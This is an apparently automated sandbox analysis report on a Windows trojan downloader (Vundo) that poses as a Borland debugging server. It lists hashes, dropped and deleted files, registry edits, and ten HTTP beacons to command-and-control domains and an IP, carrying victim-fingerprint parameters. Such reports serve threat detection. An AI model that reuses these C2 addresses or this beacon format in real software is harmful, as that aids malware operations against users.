Analysis Date: 2013-09-04 22:59:25
MD5: ea1df7a9a54e37fac0ed7b559dd8c884
SHA1: 290beb77578863b54e97de67559103bd97a897af

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: c3f747cfcf0c2edc24b003c98bc0c138 sha1: 27554337c780524de20bffb69ccb79cb02bfb9f5 size: 90112
Section_ASM2 md5: 5f4a69444c6e72fc6aa3efc3d8e6287a sha1: b44b414de39af16b0625bad3f0e675e0e9ec2844 size: 62464
Section.rdata md5: 5be8eeb9fca386416f85ea22499ceea0 sha1: 727790a1b349b756866dec182b860ae1ac42c56c size: 7680
Section.data md5: 6f9a826e30a189988861376e1c542bc6 sha1: d0bf43f0fd3dfffaf87b0234c45eeb147ecd8f07 size: 5120
Section.tls md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section.rsrc md5: 0700f6ce8a5c5f57f0abb43c0bfc0e28 sha1: 013ef4a4db6e77f6a2b3b73eb17e54ab68d4b788 size: 17920
Timestamp: 2012-09-18 22:06:08
Version:
LegalCopyright: Copyright © Borland Software Corporation 1990, 2001
InternalName: BORDBG61
FileVersion: 70.08.08.1442
CompanyName: Borland Software Corporation
ProductName: Borland Remote Debugging Server
ProductVersion: 51.00
FileDescription: Borland Remote Debugging Server
OriginalFilename: bordbg61.exe
Packer: Microsoft Visual C++ ?.?
PEhash: 96d5eb0902d5e1a03adc8ac7b1a6d8be8e91e4b8
AV avira: TR/Vundo.Gen8
AV msse: TrojanDownloader:Win32/Vundo.J
AV avg: Generic29.BLEL

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Process
↳ C:\WINDOWS\Explorer.EXE

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021494-0000-0000-C000-000000000046}\Enum\Implementing ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\NetCache\AdminPinStartTime ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021493-0000-0000-C000-000000000046}\Enum\Implementing ➝ NULL
Registry: HKEY_CURRENT_USER\SessionInformation\ProgramCount ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\SysTray\Services ➝ 31
Creates File: \Device\Afd\Endpoint
Creates File: C:\WINDOWS\system32\lzzatsb.dll
Creates File: C:\Documents and Settings\Administrator\Cookies\cf
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates Process

Process
↳ Pid 112

Network Details:

HTTP GEThttp://gleospond.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1439&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1ynSssLcdqiwsUf1ZTg+hSkg8cTyqATzH1RiDEdEWX9
User-Agent:
HTTP GEThttp://getavodes.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1439&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1ynSssLcdqiwsUf1ZTg+hSkg8cTyqATzIXFcq9iIOQb
User-Agent:
HTTP GEThttp://tryatdns.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1439&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1ynSssLcdqiwsUf1ZTg+hSkg8cTyqATzEIyygjH+Ulj
User-Agent:
HTTP GEThttp://fescheck.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1439&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1ynSssLcdqiwsUf1ZTg+hSkg8cTyqATzPVuEOS5goIV
User-Agent:
HTTP GEThttp://nsknock.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1439&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1ynSssLcdqiwsUf1ZTg+hSkg8cTyqATzM0PV9W9M7zp
User-Agent:
HTTP GEThttp://tegimode.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1439&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1ynSssLcdqiwsUf1ZTg+hSkg8cTyqATzAXF1u7wkuSc
User-Agent:
HTTP GEThttp://denadb.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1439&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1ynSssLcdqiwsUf1ZTg+hSkg8cTyqATzAc1pBneP/1j
User-Agent:
HTTP GEThttp://foradns.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1439&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1ynSssLcdqiwsUf1ZTg+hSkg8cTyqATzDptgvqnzvKR
User-Agent:
HTTP GEThttp://nshouse1.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1439&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1ynSssLcdqiwsUf1ZTg+hSkg8cTyqATzMrPTK+shi8t
User-Agent:
HTTP GEThttp://91.233.89.106/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1439&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg1ynSssLcdqiwsUf1ZTg+hSkg8cTyqATzHZIDV0j1A2H
User-Agent:
